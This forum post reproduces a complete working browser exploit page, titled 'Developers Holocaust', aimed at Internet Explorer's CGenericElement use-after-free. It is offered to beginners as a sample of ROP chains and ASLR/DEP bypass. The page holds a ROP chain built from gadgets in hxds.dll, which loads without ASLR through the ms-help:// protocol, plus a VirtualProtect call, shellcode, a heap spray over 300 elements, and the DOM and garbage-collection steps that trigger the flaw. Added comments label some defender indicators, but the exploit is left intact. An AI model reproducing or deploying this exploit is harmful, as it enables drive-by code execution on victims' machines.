Namaste

The following is the CGenericElement exploit using the ms-help:// protocol (usable when a Visual Studio version below 2010 is installed);
it is a good sample for beginners in exploitation, especially ROP chain generation and ASLR+DEP bypass:

Code:
<!--
Exploit Title: "Developers Holocaust".
Developer : "vinnu"
Team : "Legion Of Xtremers"
ASLR+DEP bypass : the "ms-help://" protocol can be used if a Visual Studio version below 2010 is installed.
It loads the non-ASLR module hxds.dll:
 Base=51BC0000
 Size=000D7000 (880640.)
 Entry=51BDA1D4 hxds.<ModuleEntryPoint>
 Name=hxds
 File version=2.05.50727.42 (RTM.050727-4200)
 Path=C:\Program Files (x86)\Common Files\Microsoft Shared\Help\hxds.dll
 Special Thanx: Garage4Hackers, happy_t3rmin4t0r,l0rd_D34thst0rm,b0nd,fb1h2s...
-->
<!doctype html>
<head>
<script>
// Two-code-unit filler that paint() appends until its payload string reaches 0x200 code units.
// "alfabetagammad" is 14 units long, so everything from index 0x0e onward is just "\u1020\u0c10".
var virtable = "alfabetagammad\u1020\u0c10".slice(0x0e);
/**
 * Builds the payload string and copies it into many DOM elements. Called once
 * from ignite(), just before the final `a.values = ...` assignment.
 *
 * What the visible code does: it concatenates the author-annotated 16-bit units
 * (the trailing comments name each pair as a gadget or an argument) followed by
 * the "Calc shellcode" string, pads that to 0x200 code units with `virtable`,
 * keeps the first 0x100 units, doubles the result until it is at least
 * 0x60000 units long, trims it to 0x40000 - redzone units and assigns it as the
 * className of `highlim` (300) freshly created, never-attached <div> elements.
 * The shape (one large string copied into hundreds of elements) reads like a
 * heap spray; that is inferred from the code, not verifiable here.
 *
 * Defender note: the observable artifact is hundreds of detached <div>s whose
 * className is an identical ~256 KiB string of non-text code units, a pattern
 * that content-inspection or script-behaviour rules can key on.
 *
 * Code-quality notes (behaviour intentionally left untouched): `bsize` is never
 * used, `airbreeze` is assigned without `var` and so becomes an implicit global,
 * and `iter` is declared twice with `var` (harmless in sloppy mode, an error
 * under strict mode / `let`).
 */
function paint()	{
	var highlim = 300;//1600;
	var bsize = 0x040000;var redzone = 0x20//0x48;
	var halloween =  "\uC876\u51BD"//"\u0102\u0103"	// pop eax;ret
					+"\u105a\u0c10"//"\u0104\u0105"// popped in eax
					+"\u3838\u51C0"//"\u0106\u0107"// and word ptr ds:[eax],0;xor eax,eax,ret8;
					+"\uC876\u51BD"//"\u0108\u0109"//pop eax,ret
					+"\u010a\u010b"
					+"\u110b\u110c"
					+"\u105e\u0c10"//"\u010e\u010f"// popped in eax
					+"\u3838\u51C0"//"\u0110\u0111"// and word ptr ds:[eax],0;xor eax,eax,ret8;
					+"\uC876\u51BD"//"\u0112\u0113"// pop eax,ret
					+"\u1114\u1115"
					+"\u111c\u111d"
					+"\u1158\u51BC"//"\u1158\u51BC"//"\u111e\u111f"// popped in eax : &VirtualProtect.
					+"\uD6B0\u51BC"//"\u10a0\u0c10"//"\u1120\u1121"	// call [eax];pop edi;pop esi;ret10
					+"\u1094\u0c10"//"\u1122\u1123"	// Address
					+"\u4096\u1123"//"\u1122\u1123"	// Size
					+"\u0040\u1125"//"\u1124\u1125"// PAGE_READWRITE_EXECUTE
					+"\u1020\u0c10"//"\u1126\u1127"	// OldProtection
					+"\u1128\u1129"
					+"\u112a\u112b"
					+"\u1094\u0c10"//"\u112c\u112d" // ASLR Bypassed, goto Shellcode.
					+"\u112e\u112f" 
					+"\u1130\u1131"
					+"\u1132\u1133"
					+"\u1134\u1135"
					+"\u1136\u1137"
					+"\u1138\u1139"
					+"\u113a\u113b"
					+"\u113c\u113d"
					+"\u27bf\u51bc"//"\u113e\u113f"	// xchg eax,esp;ret
/*					+"\u1140\u1141"
					+"\u1142\u1143"
					+"\u1144\u1145"
					+"\u1146\u1147"
					+"\u116b\u116c"
					+"\u116d\u116e"
					+"\u116f\u1170"
					+"\u1171\u1172"
					+"\u1173\u1174"
					+"\u1175\u1176"
					+"\u1177\u1178"
					+"\u1179\u117a"
*/					//Shellcode
					// Calc shellcode:
					+"\u9191\u9191\u9191\u9191\uceba\u11fa\u291f\ub1c9\udb33\ud9ce\u2474\u5ef4\u5631\u030e\u0e56\u0883\uf3fe\u68ea\u7a17\u9014\u1de8\u759c\u0fd9\ufefa\u8048\u5288\u6b61\u46dc\u19f2\u69c9\u94b3\u442f\u1944\u0af0\u3b86\u508c\u9bdb\u9bad\udd2e\uc1ea\u8fc1\u8ea3\u2070\ud2c7\u4148\u5907\u39f0\u9d22\uf385\ucd2d\u8f36\uf566\ud73d\u0456\u0b91\u4faa\uf89e\u4e58\u3176\u61a0\u9eb6\u4e9f\ude3b\u68d8\u95a4\u8b12\uae59\uf6e0\u3b85\u50f5\u9b4d\u61dd\u7a82\u6d95\u086f\u71f1\udd6e\u8d89\ue0fb\u045d\uc6bf\u4d79\u661b\u2bdb\u97ca\u933b\u3db3\u3137\u44a7\u5f1a\uc436\u2620\ud638\u082a\ue751\uc7a1\uf826\uac63\u1ac9\ud8a6\u8361\u6123\u34ec\ua59e\ub709\u552b\ua7ee\u5059\u6faa\u28b1\u05a3\u9fb5\u0fc4\u7ed6\ud357\ue537\u76df\u4148";
		/*			+"\ucccc\ucccc\ucccc\ucccc\u4141\u4141"
					+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
					+"BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB";
		*/
    // Pad with the two-unit filler until the payload is at least 0x200 UTF-16 code units long.
    while(halloween.length < 0x200) {halloween += virtable;}
	// NOTE(review): no `var` here, so airbreeze becomes a global. Only the first 0x100 units are kept.
	airbreeze = halloween.substring(0,0x100);
	// Doubling from 0x100 units stops at 0x80000 (the first power of two >= 0x60000).
	while (airbreeze.length<0x60000) {airbreeze += airbreeze}
	// Final block is 0x40000 - 0x20 units; why exactly `redzone` is reserved is not explained here.
	var ropway = airbreeze.substring(0, 0x40000 - redzone);
    var greenCodec = new Array();
	// First pass: create highlim detached <div>s (they are never appended to the document).
	for (var iter=0;iter<highlim;iter++){
        greenCodec.push(document.createElement("div"));
    }
	// Second pass: every div receives the same payload string through its className.
	for (var iter=0;iter<highlim;iter++){
		greenCodec[iter].className =  ropway;
	}
}
/**
 * Page entry point (wired from the <body onload> attribute). It creates a pool
 * of elements, performs a fixed sequence of DOM mutations around a
 * CollectGarbage() call, fills a few element titles, runs paint(), and finally
 * assigns to `a.values` on the <t:ANIMATECOLOR id="myanim"> element declared in
 * <body>.
 *
 * The exact statement order here (span creation, contentEditable, the
 * appendChild / innerHTML="" pairs, then CollectGarbage()) is what the author
 * relies on; do not reorder or "tidy" it. The call-flow comment at the bottom
 * of the file names the last assignment as the step that reaches the payload —
 * that is the author's claim and cannot be verified from this page alone.
 *
 * Defender note: the script-level indicators visible on this page are the
 * IE/JScript-only CollectGarbage() global, document.body.contentEditable="true"
 * followed by appendChild / innerHTML="" churn, an ms-help:// <script src> in
 * <body>, and an alert() placed immediately before the final assignment.
 *
 * Code-quality notes (left as-is): f0, f1, f2 and a are implicit globals, the
 * try/catch around f0.offsetParent swallows every error, and `as` is declared
 * twice with `var`.
 */
function ignite()	{
//	var sobj = document.createElement("img");
//	sobj.src="ms-help://MS.VSCC.v80/MS.Dexplore.v80.en/dv_dexplore/html/92b51076-8841-45a2-8e2b-9165146c5c23.htm";
//	document.body.appendChild(sobj);
	// 0x1000 detached <div>s; only the first 100 get a title below and only alfa[4] is read at the end.
	var alfa = new Array();
	var nsize = 0x20;
	for(var as=0;as<0x1000;as++)	{
		alfa.push(document.createElement("div"));
	}
	// Three spans appended to the body: f2 gets a <datalist>, f1 a <span> and a <table>.
    f0 = document.createElement('span');
    document.body.appendChild(f0);
    f1 = document.createElement('span');
    document.body.appendChild(f1);
    f2 = document.createElement('span');
    document.body.appendChild(f2);
    document.body.contentEditable="true";
    f2.appendChild(document.createElement('datalist'));
    f1.appendChild(document.createElement('span'));
    f1.appendChild(document.createElement('table'));
	// offsetParent is normally read-only; whatever this assignment throws is deliberately ignored.
    try{
        f0.offsetParent=null;
    }catch(e) {}
	// Clearing innerHTML drops the children added above; CollectGarbage() (IE-only) is then
	// called, presumably to release them immediately — not verifiable from here.
	f2.innerHTML="";
    f0.appendChild(document.createElement('hr'));
    f1.innerHTML="";
	CollectGarbage();
	// The <t:ANIMATECOLOR id="myanim"/> element from <body>.
	a = document.getElementById('myanim');
	
	// unescape("%uXXXX...") yields UTF-16 units; each title is cut to nsize (0x20) units.
	for(var as = 0;as<100/*0x1000*/;as++)	{
		alfa[as].title = unescape("%u1020%u0c10"/*"%u4140%u4141*/+"%u4142%u4143%u4144%u4145%u4146%u4147%u4148%u4149%u414a%u414b%u414c%u414d%u414e%u414f%u4151%u4152%u4153%u4154%u4155%u4156%u4157%u4158%u4159%u415a%u415b").substr(0,nsize);
	}
	paint();
	
	// Modal alert: execution pauses here until it is dismissed.
	alert(1);
//	window.location.reload();
	//[0x5FFF031C]
	// Last step named in the author's call-flow comment at the bottom of the file.
	a.values = alfa[4].title;
}
/**
 * Handler for the onerror attribute of the ms-help:// <script> element in <body>;
 * it ignores the load error.
 * @returns {boolean} always true
 */
function returnTrue() {
  return true;
}
</script>
</head>
<body onload="eval(ignite());">
    <t:ANIMATECOLOR id="myanim"/>
	<script src="ms-help://MS.VSCC.v80/MS.Dexplore.v80.en/dv_dexplore/html/92b51076-8841-45a2-8e2b-9165146c5c23.htm" onerror="returnTrue();" />	
</body>    
</html>
<!------Call Flow:
113f113e
01020103
01060107
01090108
01110110
01120113
011f011e
112d112c :->ASLR Bypassed.
-------->

..."vinnu"